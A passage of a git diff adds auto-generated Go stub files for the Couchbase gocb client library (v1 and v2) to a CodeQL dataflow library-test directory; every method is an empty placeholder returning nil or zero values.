_ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) CounterEx(_ string, _ int64, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) Execute() (*DocumentFragment, error) { + return nil, nil +} + +func (_ *MutateInBuilder) Insert(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) InsertEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) Remove(_ string) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) RemoveEx(_ string, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) Replace(_ string, _ interface{}) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) ReplaceEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) Upsert(_ string, _ interface{}, _ bool) *MutateInBuilder { + return nil +} + +func (_ *MutateInBuilder) UpsertEx(_ string, _ interface{}, _ SubdocFlag) *MutateInBuilder { + return nil +} + +type MutationState struct{} + +func (_ *MutationState) Add(_ ...MutationToken) {} + +func (_ *MutationState) MarshalJSON() ([]byte, error) { + return nil, nil +} + +func (_ *MutationState) UnmarshalJSON(_ []byte) error { + return nil +} + +type MutationToken struct{} + +type N1qlQuery struct{} + +func (_ *N1qlQuery) AdHoc(_ bool) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) Consistency(_ ConsistencyMode) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) ConsistentWith(_ *MutationState) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) Custom(_ string, _ interface{}) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) PipelineBatch(_ int) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) PipelineCap(_ int) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) Profile(_ QueryProfileType) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) ReadOnly(_ bool) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) ScanCap(_ int) *N1qlQuery { + return nil +} + +func (_ *N1qlQuery) Timeout(_ time.Duration) *N1qlQuery { + return nil +} + +type NodeMetadata struct { + ClusterCompatibility int + ClusterMembership string + CouchAPIBase string + Hostname string + InterestingStats map[string]float64 + MCDMemoryAllocated float64 + MCDMemoryReserved float64 + MemoryFree float64 + MemoryTotal float64 + OS string + Ports map[string]int + Status string + Uptime int + Version string + ThisNode bool +} + +type PingReport struct { + Services []PingServiceEntry +} + +func (_ *PingReport) MarshalJSON() ([]byte, error) { + return nil, nil +} + +type PingServiceEntry struct { + Service ServiceType + Endpoint string + Success bool + Latency time.Duration +} + +type QueryProfileType string + +type QueryResultMetrics struct { + ElapsedTime time.Duration + ExecutionTime time.Duration + ResultCount uint + ResultSize uint + MutationCount uint + SortCount uint + ErrorCount uint + WarningCount uint +} + +type QueryResults interface { + ClientContextId() string + Close() error + Metrics() QueryResultMetrics + Next(_ interface{}) bool + NextBytes() []byte + One(_ interface{}) error + Profile() interface{} + RequestId() string + SourceEndpoint() string +} + +type QueryRetryBehavior interface { + CanRetry(_ uint) bool + NextInterval(_ uint) time.Duration +} + +type SearchHighlightStyle string + +type SearchIndexDefinitionBuilder struct{} + +func (_ *SearchIndexDefinitionBuilder) AddField(_ string, _ interface{}) *SearchIndexDefinitionBuilder { + return nil +} + +type SearchIndexManager struct{} + +func (_ *SearchIndexManager) CreateIndex(_ SearchIndexDefinitionBuilder) error { + return nil +} + +func (_ *SearchIndexManager) DeleteIndex(_ string) (bool, error) { + return false, nil +} + +func (_ *SearchIndexManager) GetAllIndexDefinitions() ([]interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetAllIndexPartitionInfo() (interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetAllIndexStats() (interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndexDefinition(_ string) (interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndexPartitionIndexedDocumentCount(_ string) (int, error) { + return 0, nil +} + +func (_ *SearchIndexManager) GetIndexPartitionInfo(_ string) (interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndexStats(_ string) (interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndexedDocumentCount(_ string) (int, error) { + return 0, nil +} + +func (_ *SearchIndexManager) SetIndexIngestion(_ string, _ string) (bool, error) { + return false, nil +} + +func (_ *SearchIndexManager) SetIndexPlanFreeze(_ string, _ string) (bool, error) { + return false, nil +} + +func (_ *SearchIndexManager) SetIndexQuerying(_ string, _ string) (bool, error) { + return false, nil +} + +type SearchQuery struct{} + +func (_ *SearchQuery) AddFacet(_ string, _ interface{}) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Consistency(_ ConsistencyMode) *SearchQuery { + return nil +} + +func (_ *SearchQuery) ConsistentWith(_ *MutationState) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Explain(_ bool) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Fields(_ ...string) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Highlight(_ SearchHighlightStyle, _ ...string) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Limit(_ int) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Skip(_ int) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Sort(_ ...interface{}) *SearchQuery { + return nil +} + +func (_ *SearchQuery) Timeout(_ time.Duration) *SearchQuery { + return nil +} + +type SearchResultDateFacet struct { + Name string + Min string + Max string + Count int +} + +type SearchResultFacet struct { + Field string + Total int + Missing int + Other int + Terms []SearchResultTermFacet + NumericRanges []SearchResultNumericFacet + DateRanges []SearchResultDateFacet +} + +type SearchResultHit struct { + Index string + Id string + Score float64 + Explanation map[string]interface{} + Locations map[string]map[string][]SearchResultLocation + Fragments map[string][]string + Fields map[string]string + AllFields map[string]interface{} +} + +type SearchResultLocation struct { + Position int + Start int + End int + ArrayPositions []uint +} + +type SearchResultNumericFacet struct { + Name string + Min float64 + Max float64 + Count int +} + +type SearchResultStatus struct { + Total int + Failed int + Successful int + Errors interface{} +} + +type SearchResultTermFacet struct { + Term string + Count int +} + +type SearchResults interface { + Errors() []string + Facets() map[string]SearchResultFacet + Hits() []SearchResultHit + MaxScore() float64 + Status() SearchResultStatus + Took() time.Duration + TotalHits() int +} + +type ServerStats map[string]map[string]string + +type ServiceType int + +type SortOrder int + +type SpatialQuery struct{} + +func (_ *SpatialQuery) Bbox(_ []float64) *SpatialQuery { + return nil +} + +func (_ *SpatialQuery) Custom(_ string, _ string) *SpatialQuery { + return nil +} + +func (_ *SpatialQuery) Development(_ bool) *SpatialQuery { + return nil +} + +func (_ *SpatialQuery) Limit(_ uint) *SpatialQuery { + return nil +} + +func (_ *SpatialQuery) Skip(_ uint) *SpatialQuery { + return nil +} + +func (_ *SpatialQuery) Stale(_ StaleMode) *SpatialQuery { + return nil +} + +type StaleMode int + +type StreamingBucket struct{} + +func (_ *StreamingBucket) IoRouter() interface{} { + return nil +} + +type SubdocDocFlag uint8 + +type SubdocFlag uint8 + +type Transcoder interface { + Decode(_ []byte, _ uint32, _ interface{}) error + Encode(_ interface{}) ([]byte, uint32, error) +} + +type User struct { + Id string + Name string + Type string + Roles []UserRole +} + +type UserPassPair struct { + Username string + Password string +} + +type UserRole struct { + Role string + BucketName string +} + +type UserSettings struct { + Name string + Password string + Roles []UserRole +} + +type View struct { + Map string + Reduce string +} + +type ViewQuery struct{} + +func (_ *ViewQuery) Custom(_ string, _ string) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Development(_ bool) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Group(_ bool) *ViewQuery { + return nil +} + +func (_ *ViewQuery) GroupLevel(_ uint) *ViewQuery { + return nil +} + +func (_ *ViewQuery) IdRange(_ string, _ string) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Key(_ interface{}) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Keys(_ []interface{}) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Limit(_ uint) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Order(_ SortOrder) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Range(_ interface{}, _ interface{}, _ bool) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Reduce(_ bool) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Skip(_ uint) *ViewQuery { + return nil +} + +func (_ *ViewQuery) Stale(_ StaleMode) *ViewQuery { + return nil +} + +type ViewResults interface { + Close() error + Next(_ interface{}) bool + NextBytes() []byte + One(_ interface{}) error +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/v2/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/v2/stub.go new file mode 100644 index 000000000000..d04a5d768c47 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/flowsources/local/database/vendor/github.com/couchbase/gocb/v2/stub.go @@ -0,0 +1,3053 @@ +// Code generated by depstubber. DO NOT EDIT. +// This is a simple stub for github.com/couchbase/gocb/v2, strictly for use in testing. + +// See the LICENSE file for information about the licensing of the original library. +// Source: github.com/couchbase/gocb/v2 (exports: AnalyticsResult,AnalyticsResultRaw,Cluster,Collection,ExistsResult,GetResult,LookupInReplicaResult,LookupInResult,MutateInResult,MutationResult,QueryResult,QueryResultRaw,Result,ScanResult,ScanResultItem,Scope,SearchResult,SearchResultRaw,TransactionAttemptContext,TransactionGetResult,TransactionQueryResult,ViewIndexManager,ViewResult,ViewResultRaw; functions: ) + +// Package gocb is a stub of github.com/couchbase/gocb/v2, generated by depstubber. +package gocb + +import ( + context "context" + time "time" +) + +type AllowQueryingSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type AnalyticsDataset struct { + Name string + DataverseName string + LinkName string + BucketName string +} + +type AnalyticsIndex struct { + Name string + DatasetName string + DataverseName string + IsPrimary bool +} + +type AnalyticsIndexManager struct{} + +func (_ *AnalyticsIndexManager) ConnectLink(_ *ConnectAnalyticsLinkOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) CreateDataset(_ string, _ string, _ *CreateAnalyticsDatasetOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) CreateDataverse(_ string, _ *CreateAnalyticsDataverseOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) CreateIndex(_ string, _ string, _ map[string]string, _ *CreateAnalyticsIndexOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) CreateLink(_ AnalyticsLink, _ *CreateAnalyticsLinkOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) DisconnectLink(_ *DisconnectAnalyticsLinkOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) DropDataset(_ string, _ *DropAnalyticsDatasetOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) DropDataverse(_ string, _ *DropAnalyticsDataverseOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) DropIndex(_ string, _ string, _ *DropAnalyticsIndexOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) DropLink(_ string, _ string, _ *DropAnalyticsLinkOptions) error { + return nil +} + +func (_ *AnalyticsIndexManager) GetAllDatasets(_ *GetAllAnalyticsDatasetsOptions) ([]AnalyticsDataset, error) { + return nil, nil +} + +func (_ *AnalyticsIndexManager) GetAllIndexes(_ *GetAllAnalyticsIndexesOptions) ([]AnalyticsIndex, error) { + return nil, nil +} + +func (_ *AnalyticsIndexManager) GetLinks(_ *GetAnalyticsLinksOptions) ([]AnalyticsLink, error) { + return nil, nil +} + +func (_ *AnalyticsIndexManager) GetPendingMutations(_ *GetPendingMutationsAnalyticsOptions) (map[string]map[string]int, error) { + return nil, nil +} + +func (_ *AnalyticsIndexManager) ReplaceLink(_ AnalyticsLink, _ *ReplaceAnalyticsLinkOptions) error { + return nil +} + +type AnalyticsLink interface { + DataverseName() string + FormEncode() ([]byte, error) + LinkType() AnalyticsLinkType + Name() string + Validate() error +} + +type AnalyticsLinkType string + +type AnalyticsMetaData struct { + RequestID string + ClientContextID string + Metrics AnalyticsMetrics + Signature interface{} + Warnings []AnalyticsWarning +} + +type AnalyticsMetrics struct { + ElapsedTime time.Duration + ExecutionTime time.Duration + ResultCount uint64 + ResultSize uint64 + MutationCount uint64 + SortCount uint64 + ErrorCount uint64 + WarningCount uint64 + ProcessedObjects uint64 +} + +type AnalyticsOptions struct { + ClientContextID string + Priority bool + PositionalParameters []interface{} + NamedParameters map[string]interface{} + Readonly bool + ScanConsistency AnalyticsScanConsistency + Raw map[string]interface{} + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type AnalyticsResult struct{} + +func (_ *AnalyticsResult) Close() error { + return nil +} + +func (_ *AnalyticsResult) Err() error { + return nil +} + +func (_ *AnalyticsResult) MetaData() (*AnalyticsMetaData, error) { + return nil, nil +} + +func (_ *AnalyticsResult) Next() bool { + return false +} + +func (_ *AnalyticsResult) One(_ interface{}) error { + return nil +} + +func (_ *AnalyticsResult) Raw() *AnalyticsResultRaw { + return nil +} + +func (_ *AnalyticsResult) Row(_ interface{}) error { + return nil +} + +type AnalyticsResultRaw struct{} + +func (_ *AnalyticsResultRaw) Close() error { + return nil +} + +func (_ *AnalyticsResultRaw) Err() error { + return nil +} + +func (_ *AnalyticsResultRaw) MetaData() ([]byte, error) { + return nil, nil +} + +func (_ *AnalyticsResultRaw) NextBytes() []byte { + return nil +} + +type AnalyticsScanConsistency uint + +type AnalyticsWarning struct { + Code uint32 + Message string +} + +type AnalyzeDocumentOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type AppendOptions struct { + Timeout time.Duration + DurabilityLevel DurabilityLevel + PersistTo uint + ReplicateTo uint + Cas Cas + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type AttemptFunc func(*TransactionAttemptContext) error + +type AuthDomain string + +type BinaryCollection struct{} + +func (_ *BinaryCollection) Append(_ string, _ []byte, _ *AppendOptions) (*MutationResult, error) { + return nil, nil +} + +func (_ *BinaryCollection) Decrement(_ string, _ *DecrementOptions) (*CounterResult, error) { + return nil, nil +} + +func (_ *BinaryCollection) Increment(_ string, _ *IncrementOptions) (*CounterResult, error) { + return nil, nil +} + +func (_ *BinaryCollection) Prepend(_ string, _ []byte, _ *PrependOptions) (*MutationResult, error) { + return nil, nil +} + +type Bucket struct{} + +func (_ *Bucket) Collection(_ string) *Collection { + return nil +} + +func (_ *Bucket) Collections() *CollectionManager { + return nil +} + +func (_ *Bucket) CollectionsV2() *CollectionManagerV2 { + return nil +} + +func (_ *Bucket) DefaultCollection() *Collection { + return nil +} + +func (_ *Bucket) DefaultScope() *Scope { + return nil +} + +func (_ *Bucket) Internal() *InternalBucket { + return nil +} + +func (_ *Bucket) Name() string { + return "" +} + +func (_ *Bucket) Ping(_ *PingOptions) (*PingResult, error) { + return nil, nil +} + +func (_ *Bucket) Scope(_ string) *Scope { + return nil +} + +func (_ *Bucket) ViewIndexes() *ViewIndexManager { + return nil +} + +func (_ *Bucket) ViewQuery(_ string, _ string, _ *ViewOptions) (*ViewResult, error) { + return nil, nil +} + +func (_ *Bucket) WaitUntilReady(_ time.Duration, _ *WaitUntilReadyOptions) error { + return nil +} + +type BucketManager struct{} + +func (_ *BucketManager) CreateBucket(_ CreateBucketSettings, _ *CreateBucketOptions) error { + return nil +} + +func (_ *BucketManager) DropBucket(_ string, _ *DropBucketOptions) error { + return nil +} + +func (_ *BucketManager) FlushBucket(_ string, _ *FlushBucketOptions) error { + return nil +} + +func (_ *BucketManager) GetAllBuckets(_ *GetAllBucketsOptions) (map[string]BucketSettings, error) { + return nil, nil +} + +func (_ *BucketManager) GetBucket(_ string, _ *GetBucketOptions) (*BucketSettings, error) { + return nil, nil +} + +func (_ *BucketManager) UpdateBucket(_ BucketSettings, _ *UpdateBucketOptions) error { + return nil +} + +type BucketSettings struct { + Name string + FlushEnabled bool + ReplicaIndexDisabled bool + RAMQuotaMB uint64 + NumReplicas uint32 + BucketType BucketType + EvictionPolicy EvictionPolicyType + MaxTTL time.Duration + MaxExpiry time.Duration + CompressionMode CompressionMode + MinimumDurabilityLevel DurabilityLevel + StorageBackend StorageBackend + HistoryRetentionCollectionDefault HistoryRetentionCollectionDefault + HistoryRetentionBytes uint64 + HistoryRetentionDuration time.Duration +} + +type BucketType string + +type BuildDeferredQueryIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type BulkOp interface{} + +type BulkOpOptions struct { + Timeout time.Duration + Transcoder Transcoder + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type Capability uint32 + +type CapabilityStatus uint32 + +type Cas uint64 + +type ChangePasswordOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type Cluster struct{} + +func (_ *Cluster) AnalyticsIndexes() *AnalyticsIndexManager { + return nil +} + +func (_ *Cluster) AnalyticsQuery(_ string, _ *AnalyticsOptions) (*AnalyticsResult, error) { + return nil, nil +} + +func (_ *Cluster) Bucket(_ string) *Bucket { + return nil +} + +func (_ *Cluster) Buckets() *BucketManager { + return nil +} + +func (_ *Cluster) Close(_ *ClusterCloseOptions) error { + return nil +} + +func (_ *Cluster) Diagnostics(_ *DiagnosticsOptions) (*DiagnosticsResult, error) { + return nil, nil +} + +func (_ *Cluster) EventingFunctions() *EventingFunctionManager { + return nil +} + +func (_ *Cluster) Internal() *InternalCluster { + return nil +} + +func (_ *Cluster) Ping(_ *PingOptions) (*PingResult, error) { + return nil, nil +} + +func (_ *Cluster) Query(_ string, _ *QueryOptions) (*QueryResult, error) { + return nil, nil +} + +func (_ *Cluster) QueryIndexes() *QueryIndexManager { + return nil +} + +func (_ *Cluster) Search(_ string, _ SearchRequest, _ *SearchOptions) (*SearchResult, error) { + return nil, nil +} + +func (_ *Cluster) SearchIndexes() *SearchIndexManager { + return nil +} + +func (_ *Cluster) SearchQuery(_ string, _ interface{}, _ *SearchOptions) (*SearchResult, error) { + return nil, nil +} + +func (_ *Cluster) Transactions() *Transactions { + return nil +} + +func (_ *Cluster) Users() *UserManager { + return nil +} + +func (_ *Cluster) WaitUntilReady(_ time.Duration, _ *WaitUntilReadyOptions) error { + return nil +} + +type ClusterCloseOptions struct{} + +type ClusterState uint + +type Collection struct{} + +func (_ *Collection) Binary() *BinaryCollection { + return nil +} + +func (_ *Collection) Bucket() *Bucket { + return nil +} + +func (_ *Collection) Do(_ []BulkOp, _ *BulkOpOptions) error { + return nil +} + +func (_ *Collection) Exists(_ string, _ *ExistsOptions) (*ExistsResult, error) { + return nil, nil +} + +func (_ *Collection) Get(_ string, _ *GetOptions) (*GetResult, error) { + return nil, nil +} + +func (_ *Collection) GetAllReplicas(_ string, _ *GetAllReplicaOptions) (*GetAllReplicasResult, error) { + return nil, nil +} + +func (_ *Collection) GetAndLock(_ string, _ time.Duration, _ *GetAndLockOptions) (*GetResult, error) { + return nil, nil +} + +func (_ *Collection) GetAndTouch(_ string, _ time.Duration, _ *GetAndTouchOptions) (*GetResult, error) { + return nil, nil +} + +func (_ *Collection) GetAnyReplica(_ string, _ *GetAnyReplicaOptions) (*GetReplicaResult, error) { + return nil, nil +} + +func (_ *Collection) Insert(_ string, _ interface{}, _ *InsertOptions) (*MutationResult, error) { + return nil, nil +} + +func (_ *Collection) List(_ string) *CouchbaseList { + return nil +} + +func (_ *Collection) LookupIn(_ string, _ []LookupInSpec, _ *LookupInOptions) (*LookupInResult, error) { + return nil, nil +} + +func (_ *Collection) LookupInAllReplicas(_ string, _ []LookupInSpec, _ *LookupInAllReplicaOptions) (*LookupInAllReplicasResult, error) { + return nil, nil +} + +func (_ *Collection) LookupInAnyReplica(_ string, _ []LookupInSpec, _ *LookupInAnyReplicaOptions) (*LookupInReplicaResult, error) { + return nil, nil +} + +func (_ *Collection) Map(_ string) *CouchbaseMap { + return nil +} + +func (_ *Collection) MutateIn(_ string, _ []MutateInSpec, _ *MutateInOptions) (*MutateInResult, error) { + return nil, nil +} + +func (_ *Collection) Name() string { + return "" +} + +func (_ *Collection) QueryIndexes() *CollectionQueryIndexManager { + return nil +} + +func (_ *Collection) Queue(_ string) *CouchbaseQueue { + return nil +} + +func (_ *Collection) Remove(_ string, _ *RemoveOptions) (*MutationResult, error) { + return nil, nil +} + +func (_ *Collection) Replace(_ string, _ interface{}, _ *ReplaceOptions) (*MutationResult, error) { + return nil, nil +} + +func (_ *Collection) Scan(_ ScanType, _ *ScanOptions) (*ScanResult, error) { + return nil, nil +} + +func (_ *Collection) ScopeName() string { + return "" +} + +func (_ *Collection) Set(_ string) *CouchbaseSet { + return nil +} + +func (_ *Collection) Touch(_ string, _ time.Duration, _ *TouchOptions) (*MutationResult, error) { + return nil, nil +} + +func (_ *Collection) Unlock(_ string, _ Cas, _ *UnlockOptions) error { + return nil +} + +func (_ *Collection) Upsert(_ string, _ interface{}, _ *UpsertOptions) (*MutationResult, error) { + return nil, nil +} + +type CollectionHistorySettings struct { + Enabled bool +} + +type CollectionManager struct{} + +func (_ *CollectionManager) CreateCollection(_ CollectionSpec, _ *CreateCollectionOptions) error { + return nil +} + +func (_ *CollectionManager) CreateScope(_ string, _ *CreateScopeOptions) error { + return nil +} + +func (_ *CollectionManager) DropCollection(_ CollectionSpec, _ *DropCollectionOptions) error { + return nil +} + +func (_ *CollectionManager) DropScope(_ string, _ *DropScopeOptions) error { + return nil +} + +func (_ *CollectionManager) GetAllScopes(_ *GetAllScopesOptions) ([]ScopeSpec, error) { + return nil, nil +} + +func (_ *CollectionManager) UpdateCollection(_ CollectionSpec, _ *UpdateCollectionOptions) error { + return nil +} + +type CollectionManagerV2 struct{} + +func (_ *CollectionManagerV2) CreateCollection(_ string, _ string, _ *CreateCollectionSettings, _ *CreateCollectionOptions) error { + return nil +} + +func (_ *CollectionManagerV2) CreateScope(_ string, _ *CreateScopeOptions) error { + return nil +} + +func (_ *CollectionManagerV2) DropCollection(_ string, _ string, _ *DropCollectionOptions) error { + return nil +} + +func (_ *CollectionManagerV2) DropScope(_ string, _ *DropScopeOptions) error { + return nil +} + +func (_ *CollectionManagerV2) GetAllScopes(_ *GetAllScopesOptions) ([]ScopeSpec, error) { + return nil, nil +} + +func (_ *CollectionManagerV2) UpdateCollection(_ string, _ string, _ UpdateCollectionSettings, _ *UpdateCollectionOptions) error { + return nil +} + +type CollectionQueryIndexManager struct{} + +func (_ *CollectionQueryIndexManager) BuildDeferredIndexes(_ *BuildDeferredQueryIndexOptions) ([]string, error) { + return nil, nil +} + +func (_ *CollectionQueryIndexManager) CreateIndex(_ string, _ []string, _ *CreateQueryIndexOptions) error { + return nil +} + +func (_ *CollectionQueryIndexManager) CreatePrimaryIndex(_ *CreatePrimaryQueryIndexOptions) error { + return nil +} + +func (_ *CollectionQueryIndexManager) DropIndex(_ string, _ *DropQueryIndexOptions) error { + return nil +} + +func (_ *CollectionQueryIndexManager) DropPrimaryIndex(_ *DropPrimaryQueryIndexOptions) error { + return nil +} + +func (_ *CollectionQueryIndexManager) GetAllIndexes(_ *GetAllQueryIndexesOptions) ([]QueryIndex, error) { + return nil, nil +} + +func (_ *CollectionQueryIndexManager) WatchIndexes(_ []string, _ time.Duration, _ *WatchQueryIndexOptions) error { + return nil +} + +type CollectionSpec struct { + Name string + ScopeName string + MaxExpiry time.Duration + History *CollectionHistorySettings +} + +type CompressionMode string + +type ConflictResolutionType string + +type ConnectAnalyticsLinkOptions struct { + LinkName string + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CouchbaseList struct{} + +func (_ *CouchbaseList) Append(_ interface{}) error { + return nil +} + +func (_ *CouchbaseList) At(_ int, _ interface{}) error { + return nil +} + +func (_ *CouchbaseList) Clear() error { + return nil +} + +func (_ *CouchbaseList) IndexOf(_ interface{}) (int, error) { + return 0, nil +} + +func (_ *CouchbaseList) Iterator() ([]interface{}, error) { + return nil, nil +} + +func (_ *CouchbaseList) Prepend(_ interface{}) error { + return nil +} + +func (_ *CouchbaseList) RemoveAt(_ int) error { + return nil +} + +func (_ *CouchbaseList) Size() (int, error) { + return 0, nil +} + +type CouchbaseMap struct{} + +func (_ *CouchbaseMap) Add(_ string, _ interface{}) error { + return nil +} + +func (_ *CouchbaseMap) At(_ string, _ interface{}) error { + return nil +} + +func (_ *CouchbaseMap) Clear() error { + return nil +} + +func (_ *CouchbaseMap) Exists(_ string) (bool, error) { + return false, nil +} + +func (_ *CouchbaseMap) Iterator() (map[string]interface{}, error) { + return nil, nil +} + +func (_ *CouchbaseMap) Keys() ([]string, error) { + return nil, nil +} + +func (_ *CouchbaseMap) Remove(_ string) error { + return nil +} + +func (_ *CouchbaseMap) Size() (int, error) { + return 0, nil +} + +func (_ *CouchbaseMap) Values() ([]interface{}, error) { + return nil, nil +} + +type CouchbaseQueue struct{} + +func (_ *CouchbaseQueue) Clear() error { + return nil +} + +func (_ *CouchbaseQueue) Iterator() ([]interface{}, error) { + return nil, nil +} + +func (_ *CouchbaseQueue) Pop(_ interface{}) error { + return nil +} + +func (_ *CouchbaseQueue) Push(_ interface{}) error { + return nil +} + +func (_ *CouchbaseQueue) Size() (int, error) { + return 0, nil +} + +type CouchbaseSet struct{} + +func (_ *CouchbaseSet) Add(_ interface{}) error { + return nil +} + +func (_ *CouchbaseSet) Clear() error { + return nil +} + +func (_ *CouchbaseSet) Contains(_ string) (bool, error) { + return false, nil +} + +func (_ *CouchbaseSet) Iterator() ([]interface{}, error) { + return nil, nil +} + +func (_ *CouchbaseSet) Remove(_ string) error { + return nil +} + +func (_ *CouchbaseSet) Size() (int, error) { + return 0, nil +} + +func (_ *CouchbaseSet) Values() ([]interface{}, error) { + return nil, nil +} + +type CounterResult struct { + MutationResult +} + +func (_ CounterResult) Cas() Cas { + return 0 +} + +func (_ CounterResult) Content() uint64 { + return 0 +} + +func (_ CounterResult) MutationToken() *MutationToken { + return nil +} + +type CreateAnalyticsDatasetOptions struct { + IgnoreIfExists bool + Condition string + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateAnalyticsDataverseOptions struct { + IgnoreIfExists bool + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateAnalyticsIndexOptions struct { + IgnoreIfExists bool + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateAnalyticsLinkOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateBucketOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateBucketSettings struct { + BucketSettings + ConflictResolutionType ConflictResolutionType +} + +type CreateCollectionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type CreateCollectionSettings struct { + MaxExpiry time.Duration + History *CollectionHistorySettings +} + +type CreatePrimaryQueryIndexOptions struct { + IgnoreIfExists bool + Deferred bool + CustomName string + NumReplicas int + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type CreateQueryIndexOptions struct { + IgnoreIfExists bool + Deferred bool + NumReplicas int + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type CreateScopeOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DecrementOptions struct { + Timeout time.Duration + Expiry time.Duration + Initial int64 + Delta uint64 + DurabilityLevel DurabilityLevel + PersistTo uint + ReplicateTo uint + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Cas Cas + Context context.Context + Internal struct { + User string + } +} + +type DeployEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DesignDocument struct { + Name string + Views map[string]View +} + +type DesignDocumentNamespace uint + +type DiagnosticsOptions struct { + ReportID string +} + +type DiagnosticsResult struct { + ID string + Services map[string][]EndPointDiagnostics + State ClusterState +} + +func (_ *DiagnosticsResult) MarshalJSON() ([]byte, error) { + return nil, nil +} + +type DisallowQueryingSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DisconnectAnalyticsLinkOptions struct { + LinkName string + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropAnalyticsDatasetOptions struct { + IgnoreIfNotExists bool + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropAnalyticsDataverseOptions struct { + IgnoreIfNotExists bool + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropAnalyticsIndexOptions struct { + IgnoreIfNotExists bool + DataverseName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropAnalyticsLinkOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropBucketOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + 